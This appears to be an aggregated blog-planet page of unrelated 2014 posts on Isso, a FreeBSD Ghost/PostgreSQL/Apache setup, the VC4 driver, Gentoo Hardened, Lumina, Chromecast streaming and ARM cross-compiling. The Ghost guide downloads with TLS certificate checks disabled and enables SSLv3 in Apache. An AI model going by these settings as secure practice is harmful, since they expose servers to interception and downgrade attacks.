Die Integration von Isso in die eigene Website funktioniert ähnlich wie die von Disqus. Das Skript wird von Isso selbst dynamisch generiert und bereit gestellt und muss lediglich eingebunden werden:

data-isso-css="false" bewirkt, dass man selbst ein passendes Stylesheet bauen und einbinden muss — für mich allerdings ein Muss, wenn man Isso wenigstens einigermaßen in das Design der eigenen Website einpassen möchte.

Damit auf einer Seite die zugehörigen Kommentare angezeigt werden, genügt es, einen Container mit der Id isso-thread zu integrieren; den Rest erledigt das eingebundene Skript.

<section id="isso-thread"></section>  
Zu guter letzt noch ein paar Dinge, die den Betrieb und die Verwendung von Isso einigermaßen komfortabel machen:

  • Benutze ein eigenes Stylesheet. Das Standard-Stylesheet passt garantiert nicht zu Deiner Website und wird dafür sorgen, dass die Isso-Kommentarthreads merkwürdig aussehen.
  • Stecke Isso hinter einen Reverse Proxy, gerne mit Caching für das JavaScript (aber nur dafür). Nutze den Proxy, um Isso über HTTPS anzubieten — das gehört sich so, vor allem wenn Isso auf Seiten zum Einsatz kommt, die selbst über HTTPS angeboten werden.
  • Konfiguriere Isso so, dass es Dich per Email über neue Kommentare benachrichtigt. Mailgun ist hierfür eine hervorragende Idee, wenn Du keinen eigenen Mailserver betreibst. In jeder Mail ist auch ein Link enthalten, mit dem Du den Kommentar wieder löschen kannst.
Wirklich komfortabel ist Isso (im Vergleich zu Disqus) für den Webmaster damit immer noch nicht, aber wenigstens wird die Privatsphäre Deiner Besucher gewahrt — und Ghostery hat übrigens auch nichts gegen Isso…

Spukschloss My Universe | 2014-08-29 21:01 UTC

Ghost ist aus Autorensicht eine prima Sache. Für den Admin indes ist es nicht ganz trivial, Ghost so zu installieren, konfigurieren und vor allem abzusichern, dass es fit für den Produktiveinsatz ist. Gerade an dieser Ecke weist die Dokumentation auch leider (noch) einige Lücken auf, daher hier eine Beschreibung, wie man Ghost auf stabile und sichere Füße stellen kann.

Im Zeitalter von IPv6 gibt es eigentlich keinen vernünftigen Grund mehr, Webseiten unverschlüsselt auszuliefern. Die durch SSL (eigentlich mittlerweile wohl eher TLS) entstehende Serverlast ist in den meisten Fällen vernachlässigbar; im Gegenzug löst HTTPS einige (aber nicht alle!) Privacy-Probleme. Insbesondere das Ghost Backend sollte zwingend mit HTTPS abgesichert sein, um dem Diebstahl von Login-Daten einen Riegel vorzuschieben.


Letztlich eignet sich jedes unixoide System für den Betrieb von Ghost, vorausgesetzt, node.js lässt sich dort installieren und konfigurieren. Ich selbst schätze für den Serverbetrieb FreeBSD sehr; insbesondere ZFS, Jails und der Paketfilter pf bilden ein rundes Paket, mit dem sich auch wenig erprobte Applikationen wie Ghost in recht sicherer Umgebung betreiben lassen.

Die Installation und Konfiguration von FreeBSD soll aber nicht Gegenstand dieses Blog-Posts sein; darüber könnte man ganze Bücher verfassen. Nur soviel: ich gehe im Folgenden davon aus, dass Ghost, Datenbank und Reverse Proxy jeweils in separaten Jails untergebracht sind.


SQLite ist für den Testbetrieb eine recht brauchbare Datenbank. In einer Produktivumgebung stößt SQLite designbedingt allerdings recht schnell an seine Grenzen, wenn es um die Bewältigung größerer Lasten geht. PostgreSQL ist ein sehr reifer, wohlerprobter und extrem leistungsfähiger relationaler Datenbankserver, und Ghost harmoniert wunderbar damit.

Bei der Installation ist einzig zu bedenken, dass PostgreSQL im Jail nur funktioniert, wenn für dieses die Verwendung der System V IPC primitives erlaubt wurde. Die Jail-Konfiguration des Datenbank-Jails könnte also etwa so aussehen:

postgresql {  
    host.hostname = "postgresql.local";
    path = "/var/jail/postgresql";
    ip4.addr = "";
    ip6.addr = "2001:db8::2/32";
Die Installation von PostgreSQL im FreeBSD-Jail ist recht problemlos:

pkg ins postgresql93-server

cat >> /etc/login.conf << EOF  

cap_mkdb /etc/login.conf

cat >> /etc/rc.conf << EOF  

/usr/local/etc/rc.d/postgresql initdb

cat >> /usr/local/pgsql/data/pg_hba.conf << EOF  
host    all             all                 md5  
host    all             all             2001:db8::/32               md5  

service postgresql start  
Jetzt fehlt nur noch eine Datenbank — und natürlich ein User für Ghost:

su - pgsql  
createuser -D -R -P ghost  
createdb ghost  
Ein simpler Test, ob alles funktioniert hat:

psql -U ghost  
Wenn kein Fehler auftritt und als Prompt ghost==> angezeigt wird, hat alles funktioniert.


Ghost selbst lässt sich ebenfalls in einem Jail installieren. Node.js aus den FreeBSD Ports kann (derzeit) bedenkenlos verwendet werden. Für Start und Überwachung des Ghost-Prozesses kommt hier Supervisor zum Einsatz. Um pg per npm installieren zu können, müssen allerdings einige fehlende Symlinks gesetzt werden.

pkg ins node npm postgresql93-client gmake py27-supervisor  
cd /usr/local/bin  
ln -s /usr/bin/c++ CXX  
ln -s /usr/bin/c++ g++  
setenv PYTHON /usr/local/bin/python2  
cd /root  
fetch --no-verify-hostname --no-verify-peer  
mkdir -p /usr/local/www/ghost  
cd /usr/local/www/ghost  
unzip /root/  
cp config.example.js config.js  
cd /usr/local/www/ghost/content  
chown -R www:www data images  
Die Datei config.js will nun noch ein wenig bearbeitet werden, so dass der Abschnitt für das Produktivsystem etwa so aussieht:

production: {  
    url: '',
    mail: {
        transport: 'SMTP',
        fromaddress: '',
        options: {
            service: 'Mailgun',
            auth: {
                user: '',
                pass: '12345abcde',
    database: {
        client: 'pg',
        connection: {
            host     : '',
            user     : 'ghost',
            password : 'secret',
            database : 'ghost',
            charset  : 'utf8'
    server: {
        host: '',
        port: '2368'
Um Ghost jetzt final zu installieren, bedarfs es nur noch weniger Handgriffe:

cd /usr/local/www/ghost  
npm install pg  
npm install --production

cat >> /usr/local/etc/supervisord.conf << EOF  
command = /usr/local/bin/node /usr/local/www/ghost/index.js  
directory = /usr/local/www/ghost  
user = www  
autostart = True  
autorestart = True  
stdout_logfile = /var/log/ghost.log  
stderr_logfile = /var/log/ghost_err.log  
environment = NODE_ENV="production"  

cat >> /etc/rc.conf << EOF  

service supervisord start  

Reverse Proxy

Ghost kann zwar theoretisch stand-alone betrieben werden; allerdings bietet erst ein vorgeschalteter Reverse Proxy die Möglichkeit, die Website über HTTPS verfügbar zu machen — und nebenbei die Auslieferung von Inhalten durch Caching zu beschleunigen.

In vielen Setups wird mittlerweile Nginx als Reverse Proxy vorgeschlagen. Bei allem Hype um Nginx wird jedoch häufig übersehen, dass der Apache Webserver eine deutlich feinere Kontrolle ermöglicht, gerade was die Konfiguration eines Reverse Proxy angeht. Und ganz nebenbei bemerkt sind die Performance-Unterschiede zwar immer noch messbar, seit Einführung des event MPMs außerhalb großer Hochleistungs-Setups jedoch ohne echte praktische Bedeutung.

Apache lässt sich unter FreeBSD zwar problemlos als Paket installieren, kommt dann jedoch mit dem veralteten prefork MPM daher. Wer in den Genuss des moderneren event MPMs kommen möchte, kommt um's selber bauen also nicht herum:

cd /usr/ports/www/apache24  
make config  
make config-recursive  
make install clean  
Damit die benötigten Module auch geladen werden, sollten folgende Einträge in der Datei /usr/local/etc/apache24/httpd.conf aktiv sein:

LoadModule cache_module libexec/apache24/  
LoadModule cache_disk_module libexec/apache24/  
LoadModule proxy_module libexec/apache24/  
LoadModule proxy_http_module libexec/apache24/  
LoadModule ssl_module libexec/apache24/  
LoadModule rewrite_module libexec/apache24/  
Die Konfiguration für die virtuellen Hosts können ebenfalls in dieser Datei (dann am Ende) eingefügt werden. Ich finde es allerdings übersichtlicher, diese in separate Dateien auszulagern, die per IncludeOptional eingebunden werden. Als Beispiel hier jetzt eine Konfiguration mit IPv6 — IPv4 lässt sich natürlich analog umsetzen:

<VirtualHost [2001:db8::1]:80>  
    ErrorLog /var/log/ghost-error.log
    CustomLog /var/log/ghost-access.log combined

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied

<VirtualHost [2001:db8::1]:443>  
    ErrorLog /var/log/ghost-error-ssl.log
    CustomLog /var/log/ghost-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    RequestHeader set X-Forwarded-Proto "https" early

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass /
    ProxyPassReverse /
    ProxyPreserveHost On

    UseCanonicalName On
    CacheRoot /usr/local/www/proxy
    CacheDirLevels 2
    CacheDirLength 5
    CacheMaxFileSize 33554432
    CacheQuickHandler on
    CacheDefaultExpire 3600
    CacheMaxExpire 1209600
    CacheMinExpire 1800
    CacheIgnoreNoLastMod On
    CacheIgnoreQueryString On
    CacheIgnoreHeaders Set-Cookie
    CacheIgnoreURLSessionIdentifiers v
    CacheStaleOnError on
    CacheHeader on 
    CacheEnable disk /
    <LocationMatch "^/ghost/">
        CacheDisable on
Die Konfiguration für den virtuellen HTTP Host leitet Requests lediglich an den virtuellen HTTPS Host weiter, indem die URL umgeschrieben wird. Anders als mit RedirectPermanent wird so der ursprüngliche Hostname im Request Header erhalten.

Die eigentliche Arbeit erledigt der virtuelle HTTPS Host: Neben restriktiven SSL-Einstellungen holt er per ProxyPass Direktive die angeforderten Inhalte von Ghost und gibt sie an den Anfrager zurück. Wenn möglich, werden allerdings Requests zunächst aus dem Cache bedient — und das selbst dann, wenn Ghost gerade ausgefallen sein sollte. Ausgenommen hiervon soll natürlich das Backend (unter /ghost) bleiben — zwar sendet Ghost selbst korrekte Cache-Header, aber um auf Nummer Sicher zu gehen, werden URLs, die mit /ghost/ beginnen, vom Caching ausgeschlossen.

Wichtig: Ghost benötigt den HTTP-Header X-Forwarded-Proto, und zwar mit dem Wert https — da Ghost selbst kein HTTPS unterstützt, ist das die einzige Möglichkeit für Ghost festzustellen, dass der Request zumindest bis zum Reverse Proxy über das HTTPS Protokoll geschützt wurde. Ist dieser Request Header nicht gesetzt, Ghost aber mit einer https:// URI konfiguriert, werden laufend Redirects generiert, die dann vom Reverse Proxy wieder mit einem Redirect beantwortet werden, so dass der Browser im Kreis rennt, bis er einen Timeout bekommt oder den Zirkelbezug bemerkt und abbricht.

Bevor der Indianer gestartet werden kann, muss allerdings das Cache-Verzeichnis noch bereit gestellt werden. Dieses muss (anders als Logfiles) dem User gehören, unter dem Apache läuft, da Dateien dynamisch zur Laufzeit geöffnet und geschlossen werden — und damit auch nachdem der Indianer seine root-Rechte abgegeben hat.

mkdir -p /usr/local/www/proxy  
chown www:www /usr/local/www/proxy  
chmod 0750 /usr/local/www/proxy  
Damit das Cache-Verzeichnis nicht irgendwann platzt, lässt sich das Hilfsprogramm htcacheclean einsetzen; dieses wird automatisch mit Apache mit installiert. Ein RC-Skript ist praktischerweise auch schon dabei, so dass nur noch die rc.conf bearbeitet werden muss:

cat >> /etc/rc.conf << EOF  

service apache24 start  
service htcacheclean start  
Das sollte es dann gewesen sein — einfach den Browser zu schicken und hoffen, dass die Registrierungsseite erscheint…

helping out with VC4 anholt's lj | 2014-08-29 20:33 UTC

I've had a couple of questions about whether there's a way for others to contribute to the VC4 driver project.  There is!  I haven't posted about it before because things aren't as ready as I'd like for others to do development (it has a tendency to lock up, and the X implementation isn't really ready yet so you don't get to see your results), but that shouldn't actually stop anyone.

To get your environment set up, build the kernel ( vc4 branch), Mesa (git:// with --with-gallium-drivers=vc4, and piglit (git://  For working on the Pi, I highly recommend having a serial cable and doing NFS root so that you don't have to write things to slow, unreliable SD cards.

You can run an existing piglit test that should work, to check your environment: env PIGLIT_PLATFORM=gbm VC4_DEBUG=qir ./bin/shader_runner tests/shaders/glsl-algebraic-add-add-1.shader_test -auto -fbo -- you should see a dump of the IR for this shader, and a pass report.  The kernel will make some noise about how it's rendered a frame.

Now the actual work:  I've left some of the TGSI opcodes unfinished (SCS, DST, DPH, and XPD, for example), so the driver just aborts when a shader tries to use them.  How they work is described in src/gallium/docs/source/tgsi.rst. The TGSI-to_QIR code is in vc4_program.c (where you'll find all the opcodes that are implemented currently), and vc4_qir.h has all the opcodes that are available to you and helpers for generating them.  Once it's in QIR (which I think should have all the opcodes you need for this work), vc4_qpu_emit.c will turn the QIR into actual QPU code like you find described in the chip specs.

You can dump the shaders being generated by the driver using VC4_DEBUG=tgsi,qir,qpu in the environment (that gets you 3/4 stages of code dumped -- at times you might want some subset of that just to quiet things down).

Since we've still got a lot of GPU hangs, and I don't have reset wokring, you can't even complete a piglit run to find all the problems or to test your changes to see if your changes are good.  What I can offer currently is that you could run PIGLIT_PLATFORM=gbm VC4_DEBUG=norast ./ tests/ results/vc4-norast; --overwrite summary/mysum results/vc4-norast will get you a list of all the tests (which mostly failed, since we didn't render anything), some of which will have assertion failed.  Now that you have which tests were assertion failing from the opcode you worked on, you can run them manually, like PIGLIT_PLATFORM=gbm /home/anholt/src/piglit/bin/shader_runner /home/anholt/src/piglit/generated_tests/spec/glsl-1.10/execution/built-in-functions/vs-asin-vec4.shader_test -auto (copy-and-pasted from the results) or PIGLIT_PLATFORM=gbm PIGLIT_TEST="XPD test 2 (same src and dst arg)" ./bin/glean -o -v -v -v -t +vertProg1 --quick (also copy and pasted from the results, but note that you need the other env var for glean to pick out the subtest to run).

Other things you might want eventually: I do my development using cross-builds instead of on the Pi, install to a prefix in my homedir, then rsync that into my NFS root and use LD_LIBRARY_PATH/LIBGL_DRIVERS_PATH on the Pi to point my tests at the driver in the homedir prefix.  Cross-builds were a *huge* pain to set up (debian's multiarch doesn't ship the .so symlink with the libary, and the -dev packages that do install them don't install simultaneously for multiple arches), but it's worth it in the end.  If you look into cross-build, what I'm using is rpi-tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian-x64/bin/arm-linux-gnueabihf-gcc and you'll want --enable-malloc0returnsnull if you cross-build a bunch of X-related packages.

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead so doesn’t need to update his LinkedIn profile yet ;-)


blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn’t happen. Work is on the way to update this accordingly.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted which shows that large binary files (in the bug, a chrome binary with debug information is shown to be more than 2 Gb in size) cannot be pax-mark’ed, with paxctl informing the user that the file is too big. The problem is when the PAX marks are in ELF (as the application mmaps the binary) – users of extended attributes based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and to fix this.


I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999 which use the repository policy rather than snapshots of the policies) are now being used as “master” in case of releases: the ebuilds can just be copied to the right version to support the releases. The release script inside the repository is adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allows users to use their own repository, and developers to work in specific branches together. By setting the right value in the users’ make.conf switching policy repositories or branches is now a breeze.
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our mids – a coding style for SELinux policies is being drafted up. This is of course based on the coding style of the reference policy, but with some Gentoo specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.
The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.

Readers of my blog for a while probably know already that I've been an Apple user over time. What is not obvious is that I have scaled down my (personal) Apple usage over the past two years, mostly because my habits, and partly because of Android and Linux getting better and better. One component is, though, that some of the advantages to be found when using Apple started to disappear for me.

I think that for me the start of the problems is to be found in the release of iOS 7. Beside the taste of not liking the new flashy UI, what I found is that it did not perform as well as previous releases. I think this is the same effect others have had. In particular the biggest problem with it for me had to do with the way I started using my iPad while in Ireland. Since I now have access to a high-speed connection, I started watching more content in streaming. In particular, thanks to my multiple trips to the USA over the past year, I got access to more video content on the iTunes store, so I wanted to watch some of the new TV series through it.

Turned out that for a few versions, and I mean a few months, iOS was keeping the streamed content in the cache, not accounting for it anywhere, and never cleaning it up. The result was that after streaming half a series, I would get errors telling me the iPad storage was full, but there was no way from the device itself to clear the cache. EIther you had to do a factory reset to drop off all the content of the device, or you had to use a Windows application to remove the cache files manually. Not very nice.

Another very interesting problem with the streaming the content: it can be slow. Not always but it can. One night I wanted to watch The LEGO Movie since I did not see it at the cinema. It's not available on the Irish Netflix so I decided to rent it off iTunes. It took the iPad four hours to download it. It made no sense. And no, the connection was not hogged by something else, and running a SpeedTest from the tablet itself showed it had all the network capacity it needed.

The iPad is not, though, the only Apple device I own; I also bought an iPod Touch back in LA when my Classic died. even though I was not really happy with downgrading from 80G down to 64G. But it's mostly okay, as my main use for the iPod is to listen to audiobooks and podcasts when I sleep — which recently I have been doing through Creative D80 Bluetooth speakers, which are honestly not great but at least don't force me to wear earphones all night long.

I had no problem before switching the iPod from one computer to the next, as I moved from iMac to a Windows disk for my laptop. When I decided to just use iTunes on the one Windows desktop I keep around (mostly to play games), then a few things stopped working as intended. It might have been related to me dropping the iTunes Match subscription, but I'm not sure about that. But what happens is that only a single track for each of the albums was being copied on the iPod and nothing else.

I tried factory reset, cable and wireless sync, I tried deleting the iTunes data on my computer to force it to figure out the iPod is new, and the current situation I'm in is only partially working: the audiobooks have been synced, but without cover art and without the playlists — some of the audiobooks I have are part of a series, or are split in multiple files if I bought them before Audible started providing single-file downloads. This is of course not very good when the audio only lasts three hours, and then I start having nightmares.

It does not help that I can't listen to my audiobooks with VLC for Android because it thinks that the chapter art is a video stream, and thus puts the stream to pause as soon as I turn off the screen. I should probably write a separate rant about the lack of proper audiobooks tools for Android. Audible has an app, but it does not allow you to sideload audiobooks (i.e. stuff I ripped from my original CDs, or that I bought on iTunes), nor it allows you to build a playlist of books, say for all the books in a series.

As I write this, I asked iTunes again to sync all the music to my iPod Touch as 128kbps AAC files (as otherwise it does not fit into the device); iTunes is now copying 624 files; I'm sure my collection contains more than 600 albums — and I would venture to say more than half I have in physical media. Mostly because no store allows me to buy metal in FLAC or ALAC. And before somebody suggests Jamendo or other similar services: yes, great, I actually bought lots of Jazz on Magnatune before it became a subscription service and I loved it, but that is not a replacement for mainstream content. Also, Magnatune has terrible security practices, don't use it.

Sorry Apple, but given these small-but-not-so-small issues with your software recently, I'm not going to buy any more devices from you. If any of the two devices I have fails, I'll just get someone to build a decent audiobook software for me one way or the other…

Some time ago I discovered the video series "Tropes vs Women in Video Games" created by Anita Sarkeesian. I found these videos very interesting as they show in an entertaining way how women are depicted in pop culture in general and in video games specifically.

Unfortunately, Anita has faced online harassments since the start of the Kickstarter campaign for Tropes vs Women in Video Games. It seems like some persons feel threatened by someone who just wants to expose how the entertainment industry presents women in movies and video games (the "damsel in distress" trope is the most common trope, that probably everyone has seen in a movie or game). To make it very clear: Anita does not campaign for any video games to be abolished. She just shows, how many (or even most) video games present a distorted image of women. Obviously, the gaming industry suffers itself from this fact, because many gamers (regardless of gender) are annoyed by the lack of strong female characters in most video games. In acknowledgement of her work, Anita has received the 2014 Game Developers Choice Ambassador Award.

During the last days, a yet unknown person harassed Anita on Twitter in an unprecedented way: The person not just insulted her but actually threatened to murder her and her family. The reactions to these threats are nearly as disturbing as the threats themselves: In the discussion boards of Heise Online (German only), many people argue that there is no systematic discrimination of women in the IT industry. However, even if one ignores the current example (and argues that Anita is not part of this industry), women are obviously discriminated in our industry: I recommend reading an interesting article written by the founder of a Silicon Valley based startup trying to find investors: Many of those investors are more interested in her than in her business and it is more routine than exception that they hit on her - even when she shows clearly that she is not interested.

We should all reflect on how we treat women in our industry and people like Anita Sarkeesian help us in doing so. Therefore, today I donated some money to her project "Feminist Frequency". I had already planned this for a long time, but the most recent events made sure that I did not wait any longer. When, if not in this troubling times, is the right time to show support? I can only ask everyone in the IT industry to also think about how we treat women and to support those that are courageous and speak up.

Will Backman has just posted his interview with Ken Moore about the new Lumina desktop environment on the bsdtalk website.  The podcast is only 28 minutes long and goes into some of the history/motivation/philosophy of the project.

Wegen der anfänglichen Internetfixiertheit (frühe Firmware spielte nur Medien ab, deren URLs im Internet zugänglich waren) hält sich hartnäckig das Gerücht, dass die Chromecast nicht fürs lokale Medienstreaming geeignet ist. Des Gegenteils kann man sich leicht überzeugen. Einfach eine MKV-Datei mit h.264 Video und MP3 auf dem heimischen Webserver ablegen, dafür sorgen, dass diese Datei mit dem Mime-Type “video/mp4″ ausgeliefert wird, dann die minimale Demo-App auf dem Webserver ausrollen und die Seite in Chrome ansteuern. Nun können “Big Buck Bunny” und Co. auf die Chromecast gestreamt werden. Netterweise hat die Demo-App ein Eingabefeld, in das man die URL des oben erwähnten MKV eintragen kann – et voilá: Chromecast spielt lokale Dateien!

Um das ganze etwas komfortabler zu machen habe ich auf Basis der zweiten Demo-App, die einen Player mitbringt, etwas gescriptet: Zunächst ein Ruby-Script, welches eine Verzeichnisstruktur nach .mkv und .mp4 durchsucht und daraus ein (statisches) HTML baut. Dazu den Javascript-Code so angepasst, dass er geklickte Links ausliest und fertig ist das simple Webfrontend um Videos von NAS oder Heimserver zur Chromecast zu schicken.

Wer sich für die Scripte interessiert, findet sie hier:

Wer helfen möchte: Am meisten würde ich mich über durchdachte Mockups für die Überarbeitung der Oberfläche freuen!

PS: Nach Schmökern in der Doku ist klar, dass auch MPEG2-TS geht. Damit muss ich mal schauen, wie ich Live-Streams des TVheadend zur Chromecast bekomme.

Erfahrene Geeks werden es kennen, Schmalspur-Geeks, wie ich es einer bin, vielleicht nicht.

Was macht man da?

Wenn man es gefunden hat, dokumentieren zum wiederfinden im eigenen Blog

Worum geht es?

Eigentlich ein verbreitetes Problem beim scripten mit bash.

Man hat einen String, Dateinamen, Pfadnamen oder ähnlich und muss ihn verändern, durchsuchen, splitten usw.

Dass das mit Builtin Funktionen mit Bash geht, zeige ich im Beispiel Script.

Da der Syntax Highlighter (aber auch das nackte pre Tag nicht mit dem << Here Dokument) klar kommt, habe ich das kleine Beispiel Script mal hochgeladen.

An interview with Ken Moore about the Lumina Desktop Environment.

File Info: 28Min, 14MB.

Ogg Link:

This is why I don’t need Google:

“I don’t need Google, my wife knows everything!” T-Shirt
I found this T-Shirt in the old part of Rhodos city, while descending the Socrates road. I bought it off course.

As we are getting ready for PC-BSD 10.0.3, I wanted to share a little preview of what to expect with the Lumina desktop environment as you move from version 0.4.0 to 0.6.2.

To give you a quick summary, pretty much everything has been updated/refined, with several new utilities written specifically for Lumina. The major new utility is the “Insight” file manager: with ZFS snapshot integration, multimedia player, and image slideshow viewer capabilities built right in by default. It also has a new snapshot utility and the desktop configuration utility has been completely rewritten. I am going to be listing more details about all the updates between the versions below, but for those of you who are not interested in the details, you can just take a look at some screenshots instead.… 





(Moving from 0.4.0 to 0.6.2)

- A desktop plugin system has been implemented, with two plugins available at the moment (a calandar plugin, and an application launcher plugin).
– The panel plugin system has been refined quite a bit, with transparency support for the panel itself and automatic plugin resizing for example.
– A new panel plugin has been added: the system dashboard. This plugin allows control over the audio volume, screen brightness, and current workspace, while also displaying the current battery status (if applicable) and containing a button to let the user log out (or shutdown/restart the system).
– The user button panel plugin has been re-implemented as well, and incorporating the functionality of the desktopbar plugin. Now the user has quick access to files/application in the ~/Desktop folder, as well as the ability to add/remove shortcuts to system applications in the desktop folder with one click.
– New backgrounds wallpapers and project logo (courtesy of iXsystems).

NOTE: Users of the older versions of the Lumina desktop will have their configuration files returned to the defaults after logging in to the new version for the first time.

The new file manager (lumina-fm, also called “Insight”):
– Browse the system and allow the bookmarking of favorite directories
– Simple multimedia player to allow playing/previewing multimedia files
– Image slideshow viewer for previewing image files
– Full ZFS file/directory restore functionality if ZFS snapshots are available
– Menu shortcuts to quickly browse attached/mounted devices
– Tabbing support for browsing multiple directories at once
– Standard file/directory management (copy/paste/delete/create)
– Supported multimedia and image formats are auto-detected on start, so if a particular file is not recognized, you just need to install the appropriate library or plugin on your system to provide support (none required by default).

The new screenshot utility (lumina-screenshot):
– Simple utility to create/save screenshots on the system.
– Can capture the entire system, or individual windows.
– Can delay the image capture for a few seconds as necessary
– Automatically assigned to the “Print Screen” keyboard shortcut by default, but also listed in the application registry under utilities.

The configuration utility (lumina-config):
– Competely new implementation
– Configure desktop appearance (background image, add desktop plugins)
– Configure panels (location, color/transparency, size, manage plugins, up to 2 panels supported per screen)
– Configure right-click menu plugins
– Manage/set global keyboard shortcuts (including shortcuts for adjusting audio volume or screen brightness)
– Manage/set default applications for the system by categories or individually
– Manage session options (enable numlock on log in, play audio chimes)
– Manage/set applications/files to be launched on log in
– Manage window system options (appearance, mouse focus policy, window placement policy, number of workspaces)

The application/file opener utility (lumina-open):
– Update the overall appearance of the application selector window.
– Fully support registered mime-types on the system now, and recommend those applications as appropriate.

Gerade mal ein weiteres Plugin für mein Serendipity gefunden.

Gibt es schon lange, ich kannte es aber leider nicht.

Ich habe bisher auf Syntax Highlighting verzichtet, weil man sich im Blog oft Probleme einhandelt. Bei diesem scheint es aber gut zu funktionieren.

Beipielweise hier mal ein Bash script:

#  Titel:
#  Autor: Bed [@]
#  Web:
#  Version 0.3
#  Voraussetzung: Benötigt wird Imagemagick für das Consolentool convert 
#  und mogrify
#  Zweck: skaliert die Bilder auf 1280x1024, wenn im Quellbild die 
#         Orientierungshinweise intakt sind,
#         wird das Bild korrekt gedreht.
#         Das skalierte Bild wird mit einer Textnotiz versehen, wenn in 
#         der Schleife der mogrify disabled wird (durch einfügen des '#')
#         wird das Branding nicht durchgeführt.
count=$(/bin/echo $NAUTILUS_SCRIPT_SELECTED_URIS|wc -w) 
teil=$[100 / $count ]
	file_name=$(echo $file | sed -e 's/file:\/\///g' -e 's/\%20/\ /g' -e 's/.*\///g')
	file_folder=$(echo $file | sed -e 's/file:\/\///g' -e 's/\%20/\ /g' -e "s/$file_name//g")
        convert -auto-orient -strip -geometry 1280x1024 -quality 80 "$file_folder/$file_name" "${file_folder}/${file_name}_resized_1280x1024.jpg"
        teiler=$[$teiler + $teil] 
        echo $teiler
        mogrify -pointsize 10 -fill gray -gravity SouthWest -draw "text 10,20 'Copyright Bernd Dau'" "${file_folder}/${file_name}_resized_1280x1024.jpg" 
        echo $teiler
        teiler=$[$teiler + $teil]  
done ) | (zenity --progress --percentage=$teil --auto-close)
Kleiner Nebeneffekt: Leser meines Blogs können nur den Highlight Effekt sehen, wenn sie den Beitrag im Original auf dem Blog ansehen. Nicht, dass mir meine Besucherzahlen besonders wichtig sind, aber Kommentare sind das Salz in der Blogsuppe. Und die bekommt man aussliesslich durch direkte Leser, nicht durch Feed Abonenten. Davon ab- ist der Blog Boom ja wohl allgemein zu Ende, oder?

Achso. Um das Highlighting zu aktivieren, wird das <pre> Tag genutzt.  <pre class="brush: bash">

Arm cross compiler setup and stuffs

This will set up a way to compile things for arm on your native system (amd64 for me)

emerge dev-embedded/u-boot-tools sys-devel/crossdev
crossdev -S -s4 -t armv7a-hardfloat-linux-gnueabi

Building the kernel

This assumes you have kernel sources, I'm testing 3.17-rc2 since they just got support for the odroid-u3 into upstream.

Also, I tend to build without modules, so keep that in mind.

# get the base config (For me on an odroid-u3
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make exynos_defconfig
# change it to add what I want/need
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make menuconfig
# build the kernel
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j10

Setting up the SD Card

I tend to be generous, 10M for the bootloader

parted /dev/sdb mklabel msdos y
parted /dev/sdb mkpart p fat32 10M 200M
parted /dev/sdb mkpart p 200M 100%
parted /dev/sdb toggle 1 boot

mkfs.vfat /dev/sdb1
mkfs.ext4 /dev/sdb2

Building uboot

This may differ between boards, but should general look like the following (I hear vanilla uboot works now)

I used the odroid-v2010.12 branch and one thing to note is that if it sees a zImage on the boot partition it will ONLY use that, kinda of annoying.

git clone git://
cd u-boot
sed -i -e "s/soft-float/float-abi=hard -mfpu=vfpv3/g" arch/arm/cpu/armv7/
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make smdk4412_config
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j1
sudo "sh /home/USER/dev/arm/u-boot/sd_fuse/ /dev/sdb"

Copying the kernel/userland

sudo -i
mount /dev/sdb2 /mnt/gentoo
mount /dev/sdb1 /mnt/gentoo/boot
cp /home/USER/dev/linux/arch/arm/boot/dts/exynos4412-odroidu3.dtb /mnt/gentoo/boot/
cp /home/USER/dev/linux/arch/arm/boot/zImage /mnt/gentoo/boot/kernel-3.17-rc2.raw
cd /mnt/gentoo/boot
cat kernel-3.17-rc2.raw exynos4412-odroidu3.dtb > kernel-3.17-rc2

tar -xf /tmp/stage3-armv7a_hardfp-hardened-20140627.tar.bz2 -C /mnt/gentoo/

Setting up userland

I tend to just copy or generate a shadow file and overwrite the root entry in /etc/shadow...

Then set up on when booted

Setting up the bootloader

put this in /mnt/gentoo/boot/boot.txt

